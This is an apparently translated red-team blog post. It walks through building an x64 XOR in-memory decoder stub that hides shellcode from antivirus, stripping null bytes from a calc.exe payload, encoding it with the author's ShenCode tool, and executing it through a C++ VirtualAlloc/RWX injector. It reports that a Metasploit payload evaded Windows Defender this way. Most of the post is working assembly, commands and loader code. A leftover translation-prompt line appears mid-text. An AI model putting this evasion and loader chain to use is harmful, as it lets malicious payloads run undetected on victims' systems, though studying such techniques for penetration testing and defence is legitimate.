Obfuscation: Polymorphic Decoder

Red teaming and penetration testing often require bypassing antivirus software in order to effectively uncover security vulnerabilities. In the previous part, we addressed obfuscating shellcode as UUIDs within the source code. This approach worked well; however, the shellcode was still detected and blocked once loaded into memory.

We now aim to address this using a polymorphic in-memory decoder—a shellcode that decrypts other shellcode.

XOR Decoder

The XOR decoder was adapted from doyler.net and modified for the x64 architecture. This adaptation was relatively straightforward, as it primarily required renaming the appropriate registers. The decoder begins with the following instruction:

_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP

JMP-CALL-POP is a technique that allows us to execute code independently of its memory location. In this first step, we jump to the label call_decoder.

call_decoder:
    call decoder        ; RSP points to the next instruction (the shellcode) 
 
    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...

Here, we can see that another part of the program is invoked directly using the CALL instruction. When this occurs, the RSP register stores a pointer to the next instruction (in our case, the shellcode) on the stack.

decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack

In the called section of the program, we retrieve the pointer from the stack into the RSI register, allowing us to determine the memory address of our shellcode.

We now proceed to the actual decryption routine:

decode:
    xor byte [rsi], 0x3F      ; The byte RSI points to, will be XORed by 0x3F
    jz Shellcode              ; jump out of the loop if 0: RSI xor 0x3F = 0
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until each byte was decoded

xor byte [rsi], 0x3F now decodes the byte pointed to by RSI. In this case, it’s the first byte of the shellcode. The decryption key is 0x3F, which can be adjusted depending on the original encoding.

jz Shellcode then checks whether the decoded byte is equal to 0x00.

$Byte \neq 0$

If the result is non-zero, execution continues with the next instruction: inc rsi

This increments RSI, pointing to the next byte of the shellcode, which will be decoded in the next iteration. jmp short decode jumps back to the beginning of the decoding routine.

$Byte = 0$

If the result is zero, the loop terminates and the shellcode is executed. It’s important to append the key value to the shellcode, because:

0x3F XOR 0x3F = 0x00

This marks the end of the shellcode and breaks the loop, eliminating the need for a separate counter.

jz Shellcode now jumps directly into our decrypted shellcode and begins execution.


calc.exe Payload

We want to use the calc.exe payload from this blog post. However, it still contains null bytes (0x00), which prevent proper decoding. Why is that? Here’s an example:

# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00

A null byte (0x00) would prematurely terminate the decoding process, as the jz Shellcode instruction interprets it as the signal to exit the loop. Therefore, we need to make a few modifications.

GS Register

The fix for the GS register from the previous post eliminates only about $2/3$ of the null bytes. This was sufficient for earlier tests. However, a small adjustment will help us fully resolve the issue:

	xor rax, rax
	mov al, 60h
	mov rax, gs:[rax]             ; 65 48 8b 00
xor rax, rax
mov rax, gs:[rax+0x60]

This also reduces our shellcode size by a few bytes.

Kernel32 Base

When searching for the Kernel32Base, we currently use the RAX register without performing any arithmetic. This leads to a null byte as well. However, we can leverage the RBX register to assist in the operation and thus avoid introducing null bytes.

		mov rax, [rax]				; 48 8b 00
		mov rax, [rax]  			; 48 8b 00
		mov rbx, [rax]
		mov rax, [rbx] 

JMP SHORT

	jmp short InvokeWinExec            ; eb 00

At this point, the code continues with the next instruction. Since execution flows correctly even without a JMP, we can simply comment out this line.

Compilation

We can now compile the code and obtain a clean opcode:

nasm -f win64 calc.asm -o calc.o

XOR Decoder Stub

Preparing the calc.exe Payload

We now need to further process the opcode so it can be used within the decoder. For this, I use my shellcode tool ShenCode:

python shencode.py extract -f calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py encode -f calc.raw -o calc.xor -x -xk 63
...
python shencode.py output -f calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!

Step-by-step:

  1. We extract the actual shellcode from calc.o and save it to calc.raw (from offset 60 to 311)
  2. We encode the extracted shellcode using the key 63 (decimal), which is 0x3F in hexadecimal, and store the result in calc.xor
  3. We generate output in C# array format (which we can also use for assembly)

We save the output, remove line breaks, and append our “magic byte” 0x3F to the end.

XOR Decoder and Payload

Now we can embed the payload into the XOR decoder. To do this, we copy the processed shellcode into the final instruction of the XOR decoder:

; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f

Additionally, we verify that the XOR key matches:

decode:
    xor byte [rsi], 0x3F

If everything is correct, we compile the decoder:

nasm -f win64 xor-decoder.asm -o xor-decoder.o

Next, we locate the shellcode offsets, extract the stub, and prepare it for use in our Inject.cpp program:

python shencode.py output -i xor-decoder.o -s inspect
 
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
 
python shencode.py extract -f xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
 
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
 
python shencode.py output -f xor-decoder.stub -s c
 
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";  
[+] DONE!

Inject.cpp

We can now embed the processed shellcode bytes into our injector program and compile it as well.

#include <stdio.h>
#include <windows.h>
#include <iostream>
#pragma warning
 
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
 
int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
	memcpyPtr(exec, payload, byteArrayLength);
	((void(*)())exec)();
    return 0;
}

Debug

Here is the technical English translation of the final section:


To test the setup, I launched a debugger and navigated to the memory region containing the XOR decoder. During debugging, you can step through the execution and observe how the instructions in the lower section are gradually decrypted. This is clearly visible in the images below, just after the call instruction (which corresponds to Shellcode: db ...).

The animation effectively illustrates how the loop executes at the top while the shellcode below is progressively decrypted.


Test with a Metasploit Payload

The XOR decoder also worked successfully in combination with a Metasploit payload. In this case, Windows Defender was unable to detect or block it.


Conclusion

To simplify the process, I’ve integrated the XOR stub as a template into ShenCode. With just two commands, you can generate a complete XOR in-memory decoder:

python shencode.py encode -f input.raw -o xor.out --xor --xorkey 63
python shencode.py create --xor-stub --xor-filename xor.out --xor-outputfile stub.raw --xor-key 63

The XOR decoder provides an effective layer of memory protection. When combined with other obfuscation techniques, it can be a powerful tool for penetration testing.